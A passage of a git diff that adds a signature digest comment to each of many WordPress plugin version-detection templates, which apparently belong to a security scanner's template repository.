b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f47fd2f7785bf7066283f3acc7e97a858ebe09d07a017c6dbdc7028f13b99949022100cf0ce81dac8663ed086e2062e11a1d1e3974d134665ef4b5abecb984a4226398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e49..f65342b2ae3 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e3fef602f1440f42cdd4881832e2fda4092c09976e3acb8491f372eb4310e38022001b789bd6c63171818753a53bb96b3af42fc2ffb24ea32e95e4da79f1871baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283de..e1ceb1eeeb0 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bda966e2f74559d0645c504021b0f47d3d01bf97bbbb35cbe5d298c29c4e968f02206f4f9bb307ff4a187b10165d68e452ee46e8a28bcde0d9312a4c80e5a3c8ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3e..f385af75b22 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022041db9392026455be1d7ba8bb8e558e78b6765693982c20269d187a7d5435127a022100a4412e1cdcb0caba5d7e3ed32f4bc9f625b7fa819a42b08986783cfdb3e838b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd44..d55320da3c3 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3774e3651f2b0bb2797946add601ab969f49fdde41e587d0bdcf550597c1437022100bfa3f14a76c4fff836a01fa0639297894459a6e019e5c5b16a35dc0e0cc68fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74c..1b9e456becc 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be5877ff1833524246b20116d568e0a4f856cf36a1c1c0c845eceb1cdc851c41022100b8afba9fa19b3f95384cdc6624a3c6e4dfd26725e16348a9cc59bfd38c4299a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074c..231e8a0331d 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9fd797e55a6779db63351cefe1a9766011e49f49d352f065a7bc4140da0157c02202433ad11f380997a3de5e2ecec111dbdf6ba31763c447f988e1f6a740d1dd9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5eb..73838c59fb6 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e6f814576d996edbdc93820332afb882e7bcecda634b6bc761ad3206c877e3e022100979f02c77cab178d0b3c0840ca33320329bc916e4e2716470c64f1a902acd2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae30..f790e3855d1 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220342561b9c90ae564534028145058258bc286720e13e2208d6e4550655af0f21e022100d9409774e1cb7a99066406e96f73d6f0ea77e7b6fdf2e2999ffedd0e55f24d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27a..245f2db21c3 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207036bdc949e6e7fd961d4bd1c93170bdc8fd25fbe3edacef8005369a31ebe7dd0220071f780f263d017649cd550762f7b9bdb76ccf0bf8567c0f72b9a8db66d2f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f047..e0039c284d6 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec42e1a0b5ce81a038e98d7edea577f5b262b00805e86581841fb3937b3b4e9d022100b5a3779aeab5916e636762b528b3f940c0815c63d0df611e7b3f7d562aac9c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f5..f1e145e3cd2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201152539a2828be423e391471184e7c6d6a54c2a6c204fadf68a6257d55c5dc8c0221009d3fe22ce4e1006258105bb29088fee8d0212b93289c95c79185b3203f128286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea697..c1ccff22ab6 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005058ca82ea5e0f4468161812de0fe3857e93d8b5b7f0e294009a13ce54fca7602203fc441deeba8d222db2b22401384196befada08c36e4e6abac9760c12f2f6e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce85..ff5652bac4b 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025000ab0fff649e3fbdf51bf18a1188300833b881c9ebdf9c24f59a24812574d022100ef961783c5b562970cf5961f173a07c29fd53012d2808b29ddf67e75e09b90c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1c..00a83df8d44 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100872d5af466f6bcd56c9987cc3c4c734edde334716c6b6c992fc10106470801f102202c0149996c7169670edd6ef44af83261031b1b209049da6c73df735f40b45dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2b..2cce0d90c10 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206968f09eeefaeb426385add158d93864313625b9ab69b51bf6931f8b0ebd7a04022049c118f7727ec312472645df35205ca66e9059ee6b8a2eb83427562d3d43fa5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0c..478f4fbc9a7 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e76b98aad6db9fd9d746d4dde4820b7c66cbd56bd0f657edf7d46a050161c58e022100e375e7a1c0f3d25e45f1f3842d7e39f7a58fbc92d94d10b9beba3a6b5407997f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca7..2d725c755c0 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220482f91a2850320030ae712c8fde420600d6237811a4a5893940ef0861f23545002207da145acf033c5457e53d4c75addc71216f4d652a1277dc7bb628ae6a44bba0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5dfe..6debae1cf19 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0daca2ac7a89e631b89fea3be3ad922b6305eeba9fd1a4c6d03265ae6ec93c022100929d28ac1d120aeba680560a2c133679c649b98248b630826a3f161815cce554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f7..0dff8a56069 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e120233c3585ec5fbe280b3bf0fc92cfd7cfcb44d2d00ae3e0d3a02a0ff7c9d7022100eed72fd3074c2115bed8755953cbf8a20f22e09ea96a448a3b40112d2364ec36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e7..4a0e24ad7ba 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e91883da47f7b783eed4b2cc14a58f15ab7714764a292fc1cdc057640edbcf0602210092612014c1ee199648d23028aa6f92c0c34ceeda02900e65e46a4b50cd86ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e3..0af454195e7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcc43d88643f8c9d614a760bf1919c479b3f69a2179d492288faefb795bdd22402210096c9168aa1c5c0773bd4b758cec36d4fbffcbc2cbbb014cd06009b6e14751d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4fa..148f97cd5ec 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f370f8f7cf88c50ee2acc5188cdf10ca4891a0a20c1b7d60753dc3ee4bfa462e022100e3a44b31f0fd4bfb3675a312d5bc0b11e6e8f90c0d2d956a426a97ac66c51a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e9..bb11fec1377 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206edb9723c6736bad572e1c5360615a93320e691413e9515b391edb45973eddb6022000f0e03f549876c3f36efa4b7f20f8d81d858aa7ab11246a6ef236d4f5b71ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f96..9eb1bbd251c 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3e9ecf3d5cc2438b711a2d55747bd18ca4d10dcaefad2123a5e1e0febcaa1d902210091d4e2b992635058d2bc52a49d13a39aa68cc0f9e3770b183579c8e01e0e8028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a27..055d7399455 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008df0b9637988b2ab8f8d98d23ee5f15e8970140d0bcf23e6150912a6ff76d533022100e3f8e930a97a4290cc007582db84e8459b4bdfe2777524854c6dce582068c8e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e45..3a45c0b193e 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021626dcf6f52ef9e814ee61767b5baf01dee0eabd067f8f48d1bab2afe1c20ed022100d7895237b2a47affc4115b4bb4f0705dc2e9ea973bddec578296120ed7ed671b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9dfa..aed4a934ee3 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100966c15190ba008645b9019526dbdd9df09ccc78c3d64529f1a022ce38eafc826022100c2c4809e823459bba3778383b01632d2762355d55cfb8fbc0b4b6b7ef3be6dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d19..3250ef47d9b 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207dcad544fd9dc7d1663df4fbf9c120830b8d4a1161786308a7187da17b3e7ea5022100932cf6ae9074472c3da6da92b46247f39e0a1c4ab6780ef431ddedada2f2c4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d46328..aff44975320 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a92b364b5e52179749c7232e5187811e866afa207a9880725372aab43a64f2e022050a74d7acdd258f6ae794166880d3293d644e5f6a8f0a7f6b99305a885b88f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c7..f0a9533e99e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd95b9d84c84a115f57fd3c640aa52896eb1cc4be9f1e0319ccc5a984df8cc350221008ba18a3eee85b1d8d8925970e6954b331f90f1e03c321f81acf36f11e65d2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee17..c50f1dfef68 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071b4bedecd6530615826e9c4a9734d2ac6a68749a27edbb22407500fc3b253f0022100904171720044e1b5110d7e5e27127c6736d057e80252e149d0b651fd72bf73b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e41..0b88e11302c 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022076f0936e725f9b1ea28840a0fa160cecfd8acbfdb18604c2a652d8b14b2e1289022003a25e9f99bbf1751db251cab7d9a70f5058c0102d1075af845a00fee437afb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a1..bce45dcf4cf 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f3a1061169bae8aabf01fadf564f2ef14c69ce62718e5d8bcaadfcd790cea88022100f0bca5c057ae41f26a97782bff34d9419637e1067732acc43aab227370457968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfcf..de14040cb20 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077f2c6b329a1829a592c0a921a6be85478cec39f70f91c9d6795ed076583bddf022100c7f2fbde20826fee9aa6308af2951876368f2f1f16ac42da8408129207d19da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d31..e31a857cf93 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc4c408d0c470f2c0584675823601449e09ad8dc8a4e3f2a0ba5ed97d9b4582202207965b6406523598b55adb0d9660523afa68badbb2b847f215caca92e8d1563ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db688..45aa5c5b44b 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df714e2f6fa99d2d355e2e8b28c9e23e40f28ee99192892062df1aeec19e7512022031c4472a3357e6df3eec13baaa1216ee30c1d7877f475abcbbe9ecf090d191b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3dbb..1542f010673 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4339f08194f73802002eda26605bea1b9e09387a4b017a2e7a2921d281978a20221009f40ed1a260eb57932a0944f9d685261130e5afbf58ca90817d4e246ace0056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca381..ff09e5c7005 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b908f6d4cb6b93291846fa49e4a0c406d1584b5b7a12238ae2ebdb0acbef8b5f022043984594cc8b60dfac64084f7a8294f734e679f49bcb7f4970b2294b045154d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255b..beb9e35c46e 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097b90758079ab8c6fb09b7e30eeeed631ea9d53c660e9896e0d79956e399cf6b022100c26421ebf9d2eac8776858caa514995a0a772e6fdb22956035f08c538b017274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d00..145f74d806f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201782cd0bcce9c13db5a6e38fb63a2c8c30957e14b8fdb436646791e5e6b30f43022100c66000f799106d297c5a71c039de882f53496b7b313f5d8a6cdcf26623e07fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed51..21e0f12172c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ced6507644a1bb1a3ce94f51d9aa92aebe82d0b0a7225ee4e9a9df3df8f2f52022019cb1aecb38e12b262a40dbf925a40be2bd87199cb2e354a0d6c7993576e20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b1..0bf4b84c030 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008324d7faa71aa472057417dc474260f265f20357dd69dba0d2f1228b9462e2b1022100c7fe50abc194761459b64c1a8eb0ed6928438b6486af1e6713c3d64c0d786136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3e..80d8311ead2 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050bfdc1b016abc6519b737a378b68ae4d78933364843ec94406928bb430c1b5e0220240d1ed79216fd1be6dd606a5a252aa70886b73314c188e95e57b93eee1899ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec50..73d41f32dbf 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207df2ea69921422bbcc246cbff12e6293bd0a8cbe7f5dd61c0f404f079607edfc022072594547f6ad0aca0198c2f86f697e8120fd58ecd0caa591d69a6ef6d5558f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a2203..1229827cfd4 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d97c992eb9410757cd5d1e81fd7bf4ee6f2fe82b89e12844015ec1a06766c0a022100b21529671646d72ee8769de037b09eaf4ff742375647ae6f158fa9948862412d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453e..f599994dae3 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b04479c8595017899c73fbed5c03eea505c936597e59fb2fcdb8a97af3369c65022059df2cf156cc95b39288c05d3c14dee05bd15681c09f8d30c9f5c8a1daa052fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac08..39aa2fb08fd 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 